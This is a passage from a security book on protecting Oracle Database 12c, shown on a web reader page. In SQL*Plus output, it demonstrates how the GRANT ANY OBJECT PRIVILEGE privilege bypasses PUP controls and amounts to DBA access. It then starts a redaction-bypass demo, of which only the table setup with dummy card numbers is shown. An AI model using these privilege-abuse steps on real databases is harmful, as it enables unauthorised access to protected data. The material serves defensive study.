Database Reference
In-Depth Information
ERROR at line 1:
ORA-01749: you may not GRANT/REVOKE privileges to/from yourself
SQL> grant all on system.PRODUCT_USER_PROFILE to gaoprole, public;
Grant succeeded.
The preceding code means GAOP can be used to bypass the PUP security controls. The PUP is already well
explained in SQL*Plus Reference by Jonathan Gennick.
http://oreilly.com/catalog/orsqplus/chapter/ch09.html
GAOP privilege effectively gives full DBA access to the holder. It can also be added to the list of system privileges,
such as CREATE ANY DIRECTORY, that effectively enable SYSDBA. Let's look at redaction next.
Redaction Bypasses
It is possible to bypass redaction control by using error messages, as shown in this example below, kindly provided by
Alex Kornbrust and tested by myself.
C:\Windows\System32>sqlplus sys/o@192.168.56.101/orcl as sysdba
SQL*Plus: Release 12.1.0.1.0 Production on Mon Feb 10 11:35:13 2014
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options
SQL> grant connect,resource to scott identified by scott;
Grant succeeded.
SQL> CREATE TABLE scott.credit_card(cust_name VARCHAR2(64), card_id VARCHAR2(64));
Table created.
SQL> INSERT INTO scott.credit_card VALUES ('Marco','1234-1234-1234-1234');
1 row created.
SQL> INSERT INTO scott.credit_card VALUES ('Hans','5678-5678-5678-5678');
1 row created.
SQL> commit;
Commit complete.
 
Previous Page
Next Page
Protecting Oracle Database 12c
Search WWH ::




Custom Search
Home